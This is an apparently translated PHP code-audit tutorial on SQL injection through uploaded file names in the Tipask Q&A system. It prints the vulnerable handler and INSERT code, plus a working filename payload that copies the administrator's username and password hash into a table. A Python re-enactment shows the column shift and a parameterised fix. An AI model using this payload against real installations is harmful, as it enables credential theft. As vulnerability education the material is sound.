[PHP Code Audit] Those Years We Explored SQL Injection Together, 7: Summary of Global Protection Blind Spots (Part 2)

0x01 Background

Web applications today usually defend against SQL injection by checking whether magic_quotes_gpc is on and, if it is not, running the request data through addslashes() to escape special characters such as single quotes. Such a global filter still has a number of blind spots. Two of them are examined below; the first part of this summary is at http://www.cnbraid.com/2016/04/29/sql5.
Blind spots:
① FILES injection: only parameters such as GET and POST are escaped globally; $_FILES is left out.
② Variable override: the dangerous functions are extract(), parse_str() and $$ (variable variables).
0x02 Vulnerability Analysis
FILES injection
FILES injection usually arises when the name of an uploaded file ($_FILES[...]['name']) is written into the database during the upload. The Tipask Q&A system is used as the example.
First, let's take a look at how global protection works:
In index.php:

```php
include TIPASK_ROOT . '/model/tipask.class.php';
$tipask = new tipask();
$tipask->run();
// ......
```

Following it into /model/tipask.class.php:

```php
function init_request() {
    // ......
    $this->get  = taddslashes($this->get, 1);
    $this->post = taddslashes(array_merge($_GET, $_POST));
    checkattack($this->post, 'post');
    checkattack($this->get, 'get');
    unset($_POST);
}
```
We can see that the get and post data are escaped with addslashes, while $_FILES is never touched. A global search for $_FILES shows that /control/attach.php handles uploads. Following it:
```php
// /control/attach.php (the lines preceding $config are cut off in the source;
// the key names follow the $config[...] lookups used further down)
$config = array(
    "uploadPath" => "data/attach/",                                   // save path
    "fileType"   => array(".rar", ".doc", ".docx", ".zip", ".pdf",
                          ".txt", ".swf", ".wmv", "xsl"),             // allowed formats
    "fileSize"   => 10                                                // size limit, in MB
);
// upload state; "SUCCESS" means the file was accepted, anything else is an error string
$state = "SUCCESS";
$clientFile = $_FILES["upfile"];
if (!isset($clientFile)) {
    echo "{'state': 'The file size exceeds the server configuration!', 'url': 'null', 'fileType': 'null'}"; // adjust upload_max_filesize and post_max_size in php.ini
    exit;
}
// format check
$current_type = strtolower(strrchr($clientFile["name"], '.'));
if (!in_array($current_type, $config['fileType'])) {
    $state = "Unsupported file type!";
}
// size check
$file_size = 1024 * 1024 * $config['fileSize'];
if ($clientFile["size"] > $file_size) {
    $state = "The file size exceeds the limit!";
}
// save the file
if ($state == "SUCCESS") {
    $targetfile = $config['uploadPath'] . gmdate('ymm', $this->time) . '/' . random(8) . strrchr($clientFile["name"], '.');
    $result = $_ENV['attach']->movetmpfile($clientFile, $targetfile);
    if (!$result) {
        $state = "An error occurred while saving the file!";
    } else {
        // here the client-supplied file name is handed to the database layer
        $_ENV['attach']->add($clientFile["name"], $current_type, $clientFile["size"], $targetfile, 0);
    }
}
// return the JSON result to the browser
echo '{"state": "' . $state . '", "url": "' . $targetfile . '", "fileType": "' . $current_type . '", "original": "' . $clientFile["name"] . '"}';
```
Note the call $_ENV['attach']->add($clientFile["name"], ...): $clientFile["name"] is $_FILES["upfile"]["name"], which never passed through taddslashes(), and add() interpolates it straight into the INSERT statement, so the file name is injectable:
```php
// attach model, add(): inserts the upload record (the method's opening lines
// are cut off in the source; the parameters match the call in attach.php)
function add($filename, $ftype, $fsize, $location, $isimage) {
    $uid = $this->base->user['uid'];
    $this->db->query("INSERT INTO " . DB_TABLEPRE . "attach(time,filename,filetype,filesize,location,isimage,uid) VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");
    return $this->db->insert_id();
}
```
Upload a file and set its name (the filename= field of the multipart request, for example via an intercepting proxy) to the following to obtain the administrator's account name and password:

```
filename="1','.php',1,(select concat(username,0x23,password) from ask_user limit 1),2,1)#.jpg"
```

The first quote closes the 'filename' literal, so the VALUES list becomes (time,'1','.php',1,(select ...),2,1): filename is '1', filetype is '.php', filesize is 1, the subquery result (username, a '#' from 0x23, and password) lands in the location column, isimage is 2 and uid is 1. Everything after # is a MySQL comment, so the rest of the original statement is discarded; the trailing .jpg matters only to the handler's strrchr()/in_array() extension check, not to the query.
The administrator's username and password are now stored in the attach table:
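The whole chain above, as an added example that is not part of the original article or of Tipask: a Python/sqlite3 re-enactment of a global filter that escapes GET and POST but skips $_FILES, a string-built INSERT with the same shape as add(), the crafted file name, and the parameterised statement that closes the hole. Because it runs on SQLite, the article's MySQL payload is translated (the # comment becomes --, concat(username,0x23,password) becomes username||'#'||password); the mechanics, a quote that closes the filename literal and a comment that swallows the rest of the statement, are the same. The table names, the admin row, the uid, timestamp and stored path are constructed sample data, and the allowed-extension check is left out.

```python
# Added example (not code from Tipask or the original article): sqlite3 re-enactment
# of the FILES injection in attach.add() and of the parameterised fix.
# The MySQL payload is translated to SQLite syntax ('#' -> '--', concat -> '||');
# table contents, uid 5, the timestamp and the stored path are constructed data.
import sqlite3

# Crafted multipart file name, SQLite dialect of the article's payload.
PAYLOAD_NAME = ("1','.php',1,"
                "(select username||'#'||password from ask_user limit 1),"
                "2,1)--.jpg")


def taddslashes(value):
    """Mimic PHP addslashes(): escape backslash, both quotes and NUL."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\x00", "\\0"))


def filter_request(get, post, files):
    """Global filter shaped like tipask.class.php init_request(): GET and POST
    values are escaped, the FILES array is handed back untouched."""
    return ({k: taddslashes(v) for k, v in get.items()},
            {k: taddslashes(v) for k, v in post.items()},
            files)


def setup_db():
    """In-memory schema with one admin row (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ask_user (uid INTEGER, username TEXT, password TEXT);
        INSERT INTO ask_user VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
        CREATE TABLE ask_attach (time INTEGER, filename TEXT, filetype TEXT,
            filesize TEXT, location TEXT, isimage INTEGER, uid INTEGER);
    """)
    return db


def add_vulnerable(db, filename, ftype, fsize, location, isimage, uid, now):
    """String-built INSERT, same shape as Tipask's add(): the file name is
    spliced into the SQL text, so a quote inside it rewrites the statement."""
    sql = ("INSERT INTO ask_attach(time,filename,filetype,filesize,location,isimage,uid) "
           f"VALUES ({now},'{filename}','{ftype}','{fsize}','{location}',{isimage},{uid})")
    db.execute(sql)
    return sql


def add_safe(db, filename, ftype, fsize, location, isimage, uid, now):
    """Fix: bind the values, so the file name is data and never SQL."""
    sql = ("INSERT INTO ask_attach(time,filename,filetype,filesize,location,isimage,uid) "
           "VALUES (?,?,?,?,?,?,?)")
    db.execute(sql, (now, filename, ftype, fsize, location, isimage, uid))
    return sql


def run_upload(add_fn, name=PAYLOAD_NAME):
    """Simulate /control/attach.php: the request goes through the global
    filter, the handler derives the extension (strrchr-like) and calls add()
    with the client-supplied name. Returns the stored (filename, location)."""
    files = {"upfile": {"name": name, "size": 42}}
    _get, _post, files = filter_request({}, {}, files)   # FILES comes back unescaped
    client = files["upfile"]
    ext = "." + client["name"].rsplit(".", 1)[-1].lower()
    db = setup_db()
    add_fn(db, client["name"], ext, client["size"],
           "data/attach/1605/abcdefgh" + ext, 0, 5, 1462000000)
    return db.execute("SELECT filename, location FROM ask_attach").fetchall()


if __name__ == "__main__":
    print("vulnerable:", run_upload(add_vulnerable))   # location holds admin#hash
    print("fixed:     ", run_upload(add_safe))         # crafted name stored verbatim
```

In the vulnerable run the location column receives admin#<hash> and filename receives 1, exactly the column shift the payload engineers; in the fixed run the whole crafted name is stored as an ordinary string. In PHP the equivalent fix is a prepared statement (PDO or mysqli), or at the very least routing $_FILES names through the same taddslashes() filter that GET and POST already receive.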
Original article: http://www.cnbraid.com/2016/05/10/sql6/